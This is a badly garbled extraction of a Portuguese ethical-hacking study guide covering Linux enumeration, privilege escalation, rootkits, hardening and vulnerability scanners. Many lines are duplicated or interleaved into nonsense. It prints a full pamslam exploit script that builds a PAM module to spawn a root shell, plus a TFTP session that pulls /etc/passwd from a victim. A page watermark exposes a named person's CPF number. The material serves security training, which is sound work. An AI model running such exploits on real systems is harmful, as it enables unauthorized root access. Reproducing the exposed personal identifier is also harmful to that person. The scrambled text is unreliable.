6000/tcp State
open Service
X11
21/tcp
7100/tcp open
open ftp
font-service
23/tcp
32771/tcp open
open telnet
sometimes-rpc5
25/tcp open
32772/tcp open smtp
sometimes-rpc7
37/tcp
32773/tcp open
open time
sometimes-rpc9
79/tcp
32774/tcp open finger
sometimes-rpc11
111/tcp
32775/tcp open
open sunrpc
sometimes-rpc13
139/tcp
32776/tcp filtered
open netbios-ssn
sometimes-rpc15
513/tcp open login
1103/tcp open xaudio
13
2049/tcp open nfs
4045/tcp open lockd
6000/tcp open X11
7100/tcp open font-service
32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7
32773/tcp open sometimes-rpc9
32774/tcp open sometimes-rpc11
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
Observe que as portas mostrados a partir deste exame são muito diferentes
diferentes do que foi
foi visto a partir
do Windows no início do livro. Portas como 37, 79, 111, e 32.771 são mostradas como abertas.
Você também vai querer perceber que o Nmap identificou o sistema operacional como Solaris.
32777/tcp open sometimes-rpc17
Enumeração
Remote operating system guess: Solaris 2.6 - 2.7
Uptime 319.638 days (since Wed May 14 19:38:19 2005)
Depois de um sistema foi digitalizado e enumerou, o próximo passo é obter acesso. Tentativas de
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
2) Explorar um Transmission Control Protocol (TCP) ou User Datagram Protocol (UDP) ouvindo
serviço.
4) Explorar o usuário fazendo-o iniciar algum tipo de ação como a execução de um anexo de e-mail
ou visitar um site hostil.
Independentemente de qual método é usado, a idéia é obter algum tipo de shell da máquina da
2)
vítima. Isto pode ser tão estúpido como adivinhar nomes de usuários e senhas para ataques mais
avançadas em canais de fundo que dependem do sistema da vítima para empurrar o shell para o
Explorar
atacante. um Transmission
Vejamos um exemplo Control Protocol
simples (TCP)um
de explorar ouprograma.
prUser Datagram
ograma. Protocol
Se a vítima (UDP) ouvindo
é encontrada
encontrada estar
serviço.
executando TFTP, você pode tentar levar a vítima a entregar arquivos críticos.
3) Explorar
root@mg vulnerabilidades
/root]# em um sistema que está fornecendo serviços de roteamento e fornecer
tftp [Link]
tftp> get /etc/passwd /root/[Link]
segurança entre duas ou
Received 1015 bytes in 0.0 mais redes.
seconds
tftp> quit
[root@mg /root]#more [Link]
4) Explorar o usuário fazendo-o iniciar algum tipo de ação como a execução de um anexo de e-mail
root:x:0:0:root:/root:/bin/bash
ou visitar um site hostil.
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
Independentemente de qual método é usado, a idéia é obter algum tipo de shell da máquina da
lp:x:4:7:lp:/var/spool/lpd:
vítima. Isto pode ser tão estúpido como adivinhar nomes de usuários e senhas para ataques mais
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
avançadas
root@mg em canaistftp
/root]# de fundo que dependem do sistema da vítima para empurrar o shell para o
[Link]
halt:x:7:0:halt:/sbin:/sbin/halt
atacante.
tftp> get Vejamos um exemplo
/etc/passwd simples de explorar um programa. Se a vítima é encontrada estar
/root/[Link]
mail:x:8:12:mail:/var/spool/mail:
Received 1015 bytes in 0.0 seconds
executando
quitTFTP, você pode tentar levar a vítima a entregar arquivos críticos.
news:x:9:13:news:/var/spool/news:
tftp>
operator:x:11:0:operator:/root:
[root@mg /root]#more [Link]
gopher:x:13:30:gopher:/usr/lib/gopher-data:
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/home/ftp:
bin:x:1:1:bin:/bin:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
daemon:x:2:2:daemon:/sbin:
named:x:25:25:Named:/var/named:/bin/false
adm:x:3:4:adm:/var/adm:
john:x:500:500:John:/home/jn:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:
clement:x:501:501:Clement:/cd/:/bin/csh
sync:x:5:0:sync:/sbin:/bin/sync
betty:x:502:502:Betty:/home/bd:/bin/pop
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
mike:x:503:503:Mike:/home/mg:/bin/bash
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
Embora você possa obter o arquivo passwd, você deve ter notado que as senhas foram sombreadas.
operator:x:11:0:operator:/root: sombreadas.
Este não foi um completo sucesso, no entanto, o atacante foi capaz de recuperar
gopher:x:13:30:gopher:/usr/lib/gopher-data: recuperar uma lista de
ftp:x:14:50:FTP User:/home/ftp:
usuários no sistema.
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
named:x:25:25:Named:/var/named:/bin/false
john:x:500:500:John:/home/jn:/bin/bash
Nota
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
É importante especificar um diretório de destino ao utilizar TFTP para obter etc do host remoto / /
mike:x:503:503:Mike:/home/mg:/bin/bash
passwd. Caso contrário, você vai substituir seu próprio arquivo / etc / passwd.
Escalação de Privilégios.
Embora você possa obter o arquivo passwd, você deve ter notado que as senhas foram sombreadas.15
Este não foi um completo sucesso, no entanto, o atacante foi capaz de recuperar uma lista de
usuários no sistema.
Nota
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
Escalação de privilégios pode ser melhor descrito como o ato de alavancar um bug ou
vulnerabilidade em um sistema operacional ou aplicativo para ter acesso aos recursos, que
normalmente teria sido protegido de um usuário médio. Estes são os ataques que normalmente são
executados localmente e estão preocupados com
com o aumento de privilégio. O objetivo é forçar um
aplicativo para executar ações que são executadas dentro de um contexto de maior segurança do
que o pretendido pelo designer, e que ao hacker é concedido acesso local e controle total. Um
exemplo de um ataque local é a vulnerabilidade pamsl
pamslam
am encontrado em algumas versões
versões antigas
do Linux:
# pamslam - vulnerability in Redhat Linux 6.1 and PAM pam_start
# found by dildog@[Link]
cat > _pamslam.c << EOF
#include<stdlib.h>
#include<unistd.h>
Escalação de privilégios pode ser melhor descrito como o ato de alavancar um bug ou
#include<sys/types.h>
vulnerabilidade
void _init(void) em um sistema operacional ou aplicativo para ter acesso aos recursos, que
normalmente teria sido protegido de um usuário médio. Estes são os ataques que normalmente são
{
setuid(geteuid());
executados localmente e estão preocupados com o aumento de privilégio. O objetivo é forçar um
system("/bin/sh");
aplicativo para executar ações que são executadas dentro de um contexto de maior segurança do
}
que
#
EOF
o pretendido
pamslam pelo designer, ein
- vulnerability queRedhat
ao hacker é concedido
Linux 6.1 andacesso local e controle total. Um
PAM pam_start
exemplo
-n de
# found
echo byum
. ataque local é a vulnerabilidade pamsl am encontrado em algumas versões antigas
dildog@[Link]
cat >-e
_pamslam.c << EOF\\t$PWD/_pamslam.so > _pamslam.conf
do Linux:
echo auth\\
\\trequired
#include<stdlib.h>
trequired\\
trequired
chmod 755 _pamslam.conf
#include<unistd.h>
echo -n .
#include<sys/types.h>
gcc -fPIC -o _pamslam.o -c _pamslam.c
void
echo _init(void)
-n o
{ -shared -o _pamslam.so _pamslam.o
ld
echosetuid(geteuid());
-n o
chmodsystem("/bin/sh");
755 _pamslam.so
}
echo -n O
rm _pamslam.c
EOF
rm _pamslam.o
echo
echo -n
O .
echo -e auth\\trequired
/usr/sbin/userhelper -w\\ t$PWD/_pamslam.so > _pamslam.conf
../../..$PWD/_pamslam.conf
chmod
sleep 755
1s _pamslam.conf
echo -n .
rm _pamslam.so
gcc -fPIC -o _pamslam.o -c _pamslam.c
rm _pamslam.conf
echo -n o
ld -shared -o _pamslam.so _pamslam.o
echo -n o
Mantendo
chmod 755o _pamslam.so
acesso e Cobertura de Pistas.
echo -n O
rm _pamslam.c
rm _pamslam.o
Objetivo:
echo O
Explicar rootkits e contramedidas
/usr/sbin/userhelper -w ../../..$PWD/_pamslam.conf
sleep 1s
rm _pamslam.so
rm _pamslam.conf
16
Objetivo:
Explicar rootkits e contramedidas
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
sistema. Rootkits requerem acesso root, mas em troca eles dão ao invasor controle completo do
sistema. O atacante pode ir e vir à vontade e esconder suas atividades
atividades a partir do administrador.
Rootkits podem conter produtos de limpeza de registro que tentam remover
remover todos os vestígios
vestígios da
presença de um atacante a partir dos arquivos de log.
log.
Rootkits podem ser divididos em dois tipos básicos: tradicionais, que substituem os binários, e os
módulos carregáveis do kernel, que corrompem o kernel. Tradicionalmente, rootkits substituiu os
binários, como ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, ou ps com versões cavalo de
Tróia.. Estas versões cavalo de Tróia. ter sido escrito para ocultar
ocultar certos processos ou informações
dos administradores. Rootkits deste tipo são detectáveis
detectáveis por causa
c ausa da mudança no tamanho dos
binários de cavalo de Tróia.. Ferramentas, como MD5sum e Tripwire, pode ser uma grande ajuda
para descobrir esses tipos de hacks.
sistema. Rootkits requerem acesso root, mas em troca eles dão ao invasor controle completo do
sistema.
O segundoO atacante pode iré eo vir
tipo de rootkit à vontade
módulo e esconder
de kernel carregásuas
carregável atividadeUm
vel (LKM). s a partir
rootkitdodeadministrador.
kernel é
Rootkits podem conter produtos de limpeza de registro que tentam remover
carregado como um driver ou extensão do kernel. Como os rootkits de kernel corrompem todos os vestígoios da
kernel,
presença de um atacante a partir dos arquivos de log.
que podem fazer basicamente qualquer coisa, incluindo a detecção por métodos de muitos software. software.
A melhor maneira de evitar esses rootkits é simplesmente recompilar o kernel sem suporte para
Rootkits podem oser
LKMs. Embora divididos
uso em édois
de rootkits tipos básicos:
generalizada, tradicionais,
muitos que substituem
administradores nãos
ainda não binários,
o sabem e os
muito
módulos carregáveis
sobre eles, do kernel,
portanto, alguns dos que
maiscorrompem
populares, ocomo
kernel. Tradicionalmente,
Flea, T0rm, e Adorm, rootkits substituiu
são discutidos os
na lista
binários,
a seguir: como ls, ifconfig, inetd, killall, login, netstat, passwd, pidof, ou ps com versões cavalo de
Tróia.. Estas versões cavalo de Tróia. ter sido escrito para ocultar certos processos ou informações
Flea. Uma vezRootkits
dos administradores. instalado, Fleatipo
deste esconde ações doisatacante
são detectáve atpor
acante dodaadministrador,
c ausa tornandodos
mudança no tamanho mais
bináriosfácil para ode
de cavalo atacante
Tróia..para reinserir ocomo
reinserir
Ferramentas, sistema em umae data
MD5sum posterior.
Tripwire, pode ser uma grande ajuda
para descobrir esses tipos de hacks.
T0rm. Este rootkit é popular entre os hackers e é notável porque quebra netstat e em binário
ps tem
O segundo tipo31.336 bytes.
de rootkit é oAmbos
móduloosdeitens podem
kernel lhevel
carregá dar(LKM).
pistas deUm
querootkit
o rootkit foi instalado.
de kernel é
carregado comoAo
Adorm. umcontrário
driver oudos
extensão
últimosdodois
kernel. Como
rootkits, os não
este rootkits
nã de kernel
o substitui corrompem
binários o kernel,
do sistema, pois é
que podem
um rootkit LKM. Adorm sistema intercepta chamadas e modifica-los quando necessário. .
fazer basicamente qualquer coisa, incluindo a detecção por métodos de muitos software
A melhor maneira
Adorm de evitar
seqüestra esseschama
sistema rootkitse écria
simplesmente
um invólucrorecompilar
em torno odekernel sem suporte
cada chamada para
e depois
LKMs. limpa
Embora o uso de rootkits é generalizada, muitos administradores ainda não sabem muito
a saída.
sobre eles, portanto, alguns dos mais populares, como Flea, T0rm, e Adorm, são discutidos na lista
a seguir:
Dica.
Certifique-se
Flea. Umaque vezvocê pode descrever
instalado, um ações
Flea esconde módulodode kernel carregável
kernel
at acante e comotornando
do administrador, ele é diferente
mais
de um rootkit
fácil para otradicional.
atacante para reinserir o sistema em uma data posterior.
Hackers
T0rm.não sãorootkit
Este os únicos a utilizar
é popular Rootkits
entre os hackers e é notável porque quebra netstat e em binário
A partir de junho de 2004, a Sony c
começou
omeçou
ps tem 31.336 bytes. Ambos os itens podem a proteger
lhe darcópias
pistas alguns
de quedos CDs da
o rootkit foiempresa de
instalado.
música mais populares do pop. Um dos esquemas de proteção contra cópia que usou é
[Link]
concebido Aouma
contrário
empresadoschamada
últimos dois
Firstrootkits, esteEsta
4 Internet. nãopeça
substitui binárioscontra
de proteção do sistema,
cópia pois é
causou
um um rootkit
enorme LKM.
clamor deAdorm
protestosistema intercepta
por causa da maneirachamadas
que elee modifica-los
ele quando necessário.
instala e se esconde. O que causou
esteAdorm seqüestra
alvoroço é que o sistema
software chama e
funcionacria
de um
uma invólucro
forma queem torno
pode de
ser cada
vista chamada
como e depois e
subserviente
Dica.
limpa aNão
saída.
intrusivo. foi um anúncio da Sony que anunciou a presença presença deste software, foi por um
usuário, Mark Russinovich, correndo RootkitRevealer em um de seus próprios próprios sistemas.
Quando alguém tenta reproduzir um CD de música protegida com com este software
soft ware
ware,, um rootkit
Certifique-se
oculto que você
de programa pode descrever
de proteção de cópiaumé módulo
[Link] l carregável
pro gra
progra
grama
ma esconde e como ele é diferente
suas trilhas, então
de um rootkit tradicional.
17
Hackers não são os únicos a utilizar Rootkits
A partir de junho de 2004, a Sony começou a proteger cópias alguns dos CDs da empresa de
música mais populares do pop. Um dos esquemas de proteção contra cópia que usou é
concebido por uma empresa chamada First 4 Internet. Esta peça de proteção contra cópia causou
um enorme clamor de protesto por causa da maneira que ele instala e se esconde. O que causou
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
você não pode desinstalá-lo e você não pode descobrir o que exatamente foi instalado. Porque
ele é carregado de modo dissimulado, é possível que o software pode ser utilizado para lançar
lançar
vírus e cavalos desenvolvidas por outros. Por causa da instalação de cautela, seu antivírus não
seria capaz de detectar tal infecção.
infecção. Como que para piorar as coisas, se você é capaz de
encontrar e remover este software, ele desativa sua unidade de CD completamente e não não pode
mais ser usada. Se há alguma boa notícia, é que os computadores Linux
Linux não são afetados.
vocêTrojan
não pode desinstalá-lo
o binário de loginepara
vocêabrir
não um
podebackdoor
descobrirpara
o que exatamente
a qualquer foi instalado.
momento Porque
o acesso.
ele é carregado de modo dissimulado, é possível que o software pode ser utilizado para lançar
Substituir
vírus e cavalosprogramas utilitários
desenvolvidas que podem
por outros. ser usados
Por causa para detectar
da instalação a atividade
de cautela, do hacker.
seu antivírus não
seria capaz de detectar tal infecção. Como que para piorar as coisas, se você é capaz de
Fornecer serviços públicos para a instalação de cavalos de tróia com os mesmos atributos de
encontrar e remover este software, ele desativa sua unidade de CD completamente e não pode
programas legítimos.
mais ser usada. Se há alguma boa notícia, é que os computadores Linux não são afetados.
Dica
Todos os rootkits permitem ataques de um invasor:
Conheça os tipos de rootkits e como eles funcionam.
Executar
Como deve sniffers secretamente
um hacker para capturar
ético responder se elesenhas.
acredita que um sistema foi comprometido e
tem umorootkit
Trojan binárioinstalado? Sua abrir
de login para primeira ação será provavelmente
ação
um backdoor para a qualquermais para remover
momento o acesso.o
hospedeiro infectado a partir da rede. Um atacante
atacante que sabe que ele foi descoberto pode
enviar paraprogramas
Substituir o lixo o sistema em que
utilitários umapodem
tentativa
serde cobrirpara
usados seusdetectar
[Link] de ser
atividade isolado da
do hacker.
rede, você pode então começar o processo
processo de sistema de auditoria e realizar alguma pesquisa
Fornecer serviços
forense. Duas públicos
principais para a instalação
ferramentas podem desercavalos de tróia
usadas para comataques
auditar os mesmos atributos de
rootkit
programas
Dica
suspeitos: legítimos.
Chkrootkit. Uma excelente ferramenta que pode ser usada para pesquisar sinais de um
rootkit. Ele tem a capacidade de analisar binários de sistema para modificação.
Conheça os tipos de rootkits e como eles funcionam.
Rootkit Hunter. Outra ferramenta que analisa arquivos
arqu ivos binários e sistema de rootkits
conhecidos e desconhecidos.
Como deve um hacker ético responder se ele acredita que um sistema foi comprometido e
tem um rootkit instalado? Sua primeira ação será provavelmente mais para remover o
Encontrar
hospedeirooinfectado
rootkit não é o mesmo
a partir queUm
da rede. veratacante
a justiçaque
sersabe
[Link]
A esmagadora maioriapode
ele foi descoberto dos
indivíduos
enviar paraque atacam
o lixo sistemas
o sistema ficamtentativa
em uma [Link]
natureza
seusglobal da Depois
rastros. Internetde
torna difícil da
ser isolado
rastrear hackers e trazê-los à justiça.
rede, você pode então começar o processo de sistema de auditoria e realizar alguma pesquisa
forense. Duas principais ferramentas podem ser usadas para auditar ataques rootkit
Endurecendo
suspeitos: o Linux
Objetivo:
Chkrootkit. Uma excelente ferramenta que pode ser usada para pesquisar sinais de um
Descrever
rootkit. Ele como o Linux
tem a capacidade é seguro.
de analisar binários de sistema para modificação.
Rootkit Hunter. Outra ferramenta que analisa arqu ivos binários e sistema de rootkits
conhecidos e desconhecidos.
18
Encontrar o rootkit não é o mesmo que ver a justiça ser feita. A esmagadora maioria dos
indivíduos que atacam sistemas ficam impune. A natureza global da Internet torna difícil
rastrear hackerso eLinux
Endurecendo trazê-los à justiça.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:55
.
Para evitar que o Linux seja hackeado, é importante endurecer o sistema e os serviços de
segurança. Mais tarde, no capítulo, olhamos para ferramentas, como o Nessus e SAINT, que
podem ser usadas para detectar formas que os atacantes podem entrar em seus sistemas Linux.
Linux.
Por enquanto, você precisa saber que após essas vulnerabilidades sejam identificadas,
identificadas, elas terão
de ser abordadas. Isto pode significar correção,
correção, remoção ou endurecimento desses serviços.
Colocação de um firewall na frente
frente de servidores críticos também é um passo importante.
Programas, como ipchains e iptables, também podem ser usados para filtrar e controlar o
tráfego. Outra solução fácil de remover programas e serviços se eles não
não são necessários. Isto é
conhecido como o princípio do menor privilégio.
privilégio. Alguns dos programas e serviços que são
considerados não-essenciais podem incluir:
. Wget. Uma ferramenta não-interativa para buscar dados sobre HTTP HTTP / HTTPS e FTP.
FTP.
Para evitar que o Linux seja hackeado, é importante endurecer o sistema e os serviços de
Finger.
segurança. MaisPermite recuperar
tarde, no informaç
informações
capítulo, olhamosões básicas
para sobre umcomo
ferramentas, usuário da Internet
o Nessus ou deque
e SAINT,
acolhimento.
podem ser usadas para detectar formas que os atacantes podem entrar em seus sistemas Linux.
Por enquanto, você precisa saber que após essas vulnerabilidades sejam identificadas, elas terão
Navegador baseado em texto Lynx que suporta HTTP / HTTPS e FTP.
de ser abordadas. Isto pode significar correção, remoção ou endurecimento desses serviços.
Colocação
Curl. deUma
um firewall na fre
ferramenta nte de
como servidores
wget-que críticos
também também
suporta é um passo
protocolos como importante.
o Telnet e
Programas,
[Link] ipchains e iptables, também podem ser usados para filtrar e controlar o
tráfego. Outra solução fácil de remover programas e serviços se eles não são necessários. Isto é
SCP.
conhecido Transferência
como o princípiosegura de arquivos
do menor usando
privilégio. Algunso protocolo SSH. e serviços que são
dos programas
considerados não-essenciais podem incluir:
FTP. A linha de comando cliente de FTP.
Wget. Uma ferramenta não-interativa para buscar dados sobre HTTP / HTTPS e FTP.
Telnet. O cliente Telnet Linux de linha de comando.
Finger. Permite recuperar informações básicas sobre um usuário da Internet ou de
TFTP. Trivial FTP.
acolhimento.
Ping. Também pode ser usado como uma ferramenta de DoS bastante rudimentar.
Navegador baseado em texto Lynx que suporta HTTP / HTTPS e FTP.
Desligando
Curl. serviços desnecessários,
Uma ferramenta como wget-queremover
tambémprogramas desnecessários,
suporta protocolos como oe Telnet
aplicar eos
patches
[Link] segurança mais recentes é conhecido como endurecimento
endurecimento sistema. Ao tentar
endurecer o seu sistema Linux, uma boa fonte de informação é as diretrizes da NSA de
SCP. Transferência
endurecimento, poissegura de arquivos
eles podem usando o protocolo
ser encontrados SSH.
em [Link]/snac
[Link]/snac..
FTP. A linhaade
Em seguida comando
discussão cliente de
é chroot. [Link] coloca um programa
Chroot prog rama em uma
sandbox. O termo refere-se a caixa de areia no
Telnet. O cliente Telnet Linux de linha de comando. conceito de se limitar a atividade de um
programa de aplicação e dos limites. Mais precisamente, ele ele redefine o diretório raiz
TFTP. Trivial
ou/de um FTP. ou sessão de login. Tudo fora do diretório que você definir que
programa
chroot pode usar não existe até um programa estar em causa. Ele efetivamente prende
Ping. Também
um processo empode
umaser usado
parte como uma
do sistema ferramenta
de arquivo de DoS
a partir bastante
do qual rudimentar.
o processo não pode
escapar. Devido a este bloqueio, é importante lembrar que todos os arquivos necessários
Desligando serviços
a uma programa desnecessários,
chroot remover programas
para a funcionalidade desnecessários,
adequada deve e aplicar
estar presente dentroos
da
patches de segurança mais recentes é conhecido como endurec imento sistema.
prisão. Chroot é comumente usado por programas como FTP, BIND, e-mail, e Apache. Ao tentar
endurecer o seu sistema Linux, uma boa fonte de informação é as diretrizes da NSA de
endurecimento,
Envoltório (TCPpois eles podem
Wrapper) TCP éseroutra
encontrados emque
ferramenta [Link]/snac .
pode ser usada para endurecer
TCP Wrapper permite que você especifique quais hosts têm permissão de acesso.
TCP Wrapper é ativada por ter inetd que chama o daemon wrapper
wrapper TCP.
Linux.
Dois Wietse são
arquivos Venema desenvolveu
usados o programa
para verificar [Link] Wrapper
acesso para proteger os
e [Link].
computadores contra ataques de hackers. Por mui tos anos, este foi um dos métodos
padrão
O utilizados
serviço funcionapara
porendurecer
TCP WrapperLinux. Está agora entre
inserindo-se a ser osubstituídos
serviço e opor xinetd.d,
mundo que é
exterior.
considerada
Você usa doismais granular.
arquivos paraServiços
a gestãode derede comodeFinger
controle acesso:, FTP, rlogin, Telnet e TFTP
pode ser configurado para uso TCP Wrapper. Mais informações sobre TCP Wrapper
[Link]. Lista todos os anfitriões com conectividade com o sistema que pode se
seguinte forma:
conectar a um serviço específico.
TCP Wrapper permite que você especifique quais hosts têm permissão de acesso.
[Link]. funciona da mesma forma como como a maioria das ACL AC Ls, porque se não for
TCP Wrapper épermitido,
expressamente ativada poro ter inetdserá
acesso quenegado.
chama o daemon wrapper TCP.
Ser capaz de descrever as várias ferramentas utilizadas para proteger o Linux como
Tripwire e TCP Wrapper.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:15:34
lastlog. O arquivo / var / log / lastlog acompanha o último login de contas de usuário no
sistema.
Dica
Ferramentas Automatizadas
Automatizadas de Avaliação.
Avaliação.
Para combater esses problemas, os hackers éticos podem se beneficiar de ferramentas de avaliação
automatizadas. Na mai
Categorias ferramenta
ferramen taoria das situações,
automatizada os hacker
liação s éticos vão usar uma combinação de ferramentas
de Avaliação
Ava
manuais e automatizadas. Ferramentas automatizadas permitem que o hacker ético possa cobrir um lote
de terreno rapidamente e usar os resultados para mais mais inspeção manual. Toda uma gama de
ferramentas de avaliação de segurança estão disponíveis. Algumas olham para o código fonte, as outras
Objetivo:
olham para aplicações, e outros ainda são desenvolvidas para olhar para sistemas inteiros ou redes. Essas
Discutir
soluçõesos diferenttê
diferentes
também esmtipos de instrumentos
instrument
usabilidade osces
e interfa automatizados de avaliação.
diferentes, que avalia
variamção.
de linha de comando nas interfaces
GUI para produtos. Estes produtos também podem ser divididos em outras categorias, como alguns são
gratuitos e outros são para compra ou que são executados através de um serviço de assinatura.
Você verá que não
não há falta de ferramentas
ferramentas de avaliação de vulnerabilidade
vulnerabilidade no mercado.
mercado. Estas
Categorias ferramen
ferramentas podemta automatizada de Ava liação
podem ser utilizadas para verificar
verificar se os computadores
computadores internos ou externos
externos para detectar
vulnerabilidades. Algumas
Algumas dessas ferramentas
ferramentas são comerciais e pode exigir uma assinatura anual,
enquanto outros são
são de código aberto e não vai custar nada para adquirir
adquirir inicialmente.
inicialmente. Todas estas
ferramentas
Objetivo: pode
podem m ser divididos em três c
categorias
ategorias básicas, inclu
incluindo:
indo:
VocêScanners
verá quednãe oCódigo
há falta
Fode
[Link] de avaliação de vulnerabilidade no mercado. Estas
Fonte.
ferramentas podem ser utilizadas para verificar se os computadores internos ou externos para detectar
vulnerabilidades.
Algumas dessas ferramentas são comerciais e pode exigir uma assinatura anual,
enquanto
outros são de código aberto e não vai custar nada para adquirir inicialmente. Todas estas 21
ferramentas
podem ser divididos em três categorias básicas, incluindo:
Scanners de código-fonte
código-fonte podem ser usados para ajudar ajudar em problemas de auditoria
auditoria de segurança em
código fonte. Scanners de código fonte podem podem detectar problemas,
problemas, tais como buffer overflows,
overflows,
condições de corrida, escalação
escalação de privilégios,
privilégios, e entrada contaminada.
contaminada. Buffer overflows
overflows permitir que
dados sejam escritos
escritos sobre partes do do seu executável, que podem permitir que um usuário usuário malicioso
possa fazer praticamente
praticamente qualquer coisa. Condições de corrida pode pode evitar que os sistemas
sistemas de proteção
de funcionam corretamente,
corretamente, ou negar a disponibilidade
disponibilidade de recursos
recursos para os seus
seus usuários legítimos.
legítimos.
Escalação de privilégios
privilégios ocorre quando o código
código é executado com com privilégios maiores
maiores do que a do
usuário executou. Contaminação
Contaminação de entrada
entrada permite que que os dados potencialmente sem verificação
através de suas defesas,
defesas, possivelmente,
possivelmente, qualificada como informação
informação de erros já verificados. Algumas
ferramentas usadas
usadas para encontrar estes tipos tipos de problemas incluem:
incluem:
Scanners de código-fonte podem ser usados para ajudar em problemas de auditoria de segurança em
código fonte. Scanners de código fonte podem detectar problemas, tais como buffer overflows,
condições de corrida, escalação de privilégios, e entrada contaminada. Buffer overflows permitir que
Flawfinder. Um programa
programa Python que procuraprocura através de código
código fonte para potenciais falhas
falhas de
dados sejam escritos
segurança, sobreo partes
listand
listando do seu
potenciais executável,
falhas que podem
de segurança
segurança permitir
classificad as porque
classificadas umcom
risco, usuári
asofalhas
malicioso
falhas
possa fazer praticamentemais
potencialmente qualquer coisa.
perigosas mCondições
mostrada de corrida pode evitar que os sistemas de proteção
ostrada primeiro.
de funcionam
Roughcorre tamente,
Auditing Tool for
Tool ou Security
negar a disp onibilidade
(RATS). de recursos
RATS é escritA
RATS em Cpara os seuexternas
e contém s usuários legítimos.
regras DE
coleções
Escalação XMLosque
de privilégi se aplicam
se
ocorre quandoa ocada idioma.
idioma.
código é executado com privilégios maiores do que a do
StackGuard.
usuário Um compilador
compilador
executou. Contaminação que constrói
de entradconstr ói programas
a permite protegid
protegidos
que os dados os contra ataques
potencialmente sem de
dverificação
e
esmagamento de pilha. pilha. Ataques de esmagamento
esmagamento de Pilhas são são um problema comum
comum e grande
através de suas defesas, possivelmente, qualificada como informação de erros já verificados. Algumas
para aplicações Linux e Windows. Após programasprogramas são compilados com StackGuard, eles são
ferramentas
usadas para encontrar estes tipos de problemas incluem:
em grande parte imune ao ataque de esmagamento de de pilha.
Libsafe. Produz um um método de proteção
proteção no transparente
transparente que tem a grande
grande vantagem
vantagem de não
necessitar de aplica
aplicações
ções para ser rec
recompilado.
ompilado. Ela protege c
contra
ontra estouros de buffer e pode
pode
proteger aplicaç
aplicações
ões para as quais o códig
códigoo fonte não e
está
stá disponível.
Flawfinder. Um programa Python que procura através de código fonte para potenciais falhas de
segurança, listando potenciais falhas de segurança classificadas por risco, com as falhas
potencialmente mais perigosas mostrada primeiro.
Scanners a Nível de Aplicação.
Aplicação.
Rough Auditing Tool for Security (RATS). RATS é escritA em C e contém externas regras DE
coleções XML que se aplicam a cada idioma.
StackGuard. Um compilador que constrói programas protegidos contra ataques de
Scanners para nível de aplicativo são o próximo
próximo tipo de scanner de vulnerabilidade examinados.
esmagamento de pilha. Ataques de esmagamento de Pilhas são um problema comum e grande
Scanners de aplicativ
aplicativos
os fornecem testes
para aplicações Linux e Windows. Após contra
contra candidaturas
progra completascom
mas são compilados ou componentes,
StackGuard, elesemsão
em vez
de oem
código fonte.
grande Este
parte tipo de
imune ao ferramenta de avaliação de
ataque de esmagamento devulnerabilidades
vulnerabilid
pilha. ades olha como o programa
programa
estáLibsafe.
sendo executado.
executad
Produz [Link]
método de pode
proexaminar
exa minar
teção sua configuração
no transparente que etem
olhar paradeosvanta
a gran proble
problemas
gemmasde. Alguns
não
necessitar de aplica ções para ser
exemplos de nível de aplicativo incluem: recompilado. Ela protege contra estouros de buffer e p ode
proteger aplicações para as quais o código fonte não está disponível.
Scanners a Nível de Aplicação.
Whisker. Um dos scanners
scanners mais antigos de aplicativos
aplicativos da Web ainda existente.
existente. Whisker tem
tem a
capacidade de verificar
verificar vulnerabilidades CGI, e vem com excelente documentação,
documentação, que deve ser ser
cuidadosamente revista.
revista. CGI é vulnerável na medida em que pode vazar informações do sistema sistema
Scanners
que deve para nível deem
ser mantida eaplicativo
m sigilo, esão o próxi
permite mousuários
que tipo des scanner
usuário remotosde vulnerabilidade
possam examinados.
executar comandos
Scanners de aplicativ
inadequados. Whisker
Whisker osexige
fornecem testes
Perl, por contra
isso,
isso, candidaturas
se você completas
estiver indo
indo ou componentes,
usá-lo, certifique-se de queevocê
m vez
de
temo um
código
ambi fonte.
ambiente Este tipo dePerl
ente apropriado ferramenta de avaliação de vulnerabilidades olha como o programa
disponível.
disponível.
está sendo executado. Scanners pode examinar sua configuração e olhar para os problemas. Alguns
exemplos
N-stealth. de nível
Esta de aplicativo
é baseada incluem: GUI de avaliação
em ferramenta
em avaliação de aplicação vem
vem com um extenso bancobanco
de dados de mais de 30.000 vulnerabilidades
vulnerabilidades e exploits. Ela fornece um relatório bem formatado
formatado
que pode ser usado para analisar problemas
problemas como alto, médio
médio ou baixo risco.
risco.
Whisker. Um dos scanners mais antigos de aplicativos da Web ainda existente. Whisker tem a
capacidade de verificar vulnerabilidades CGI, e vem com excelente documentação, que deve ser
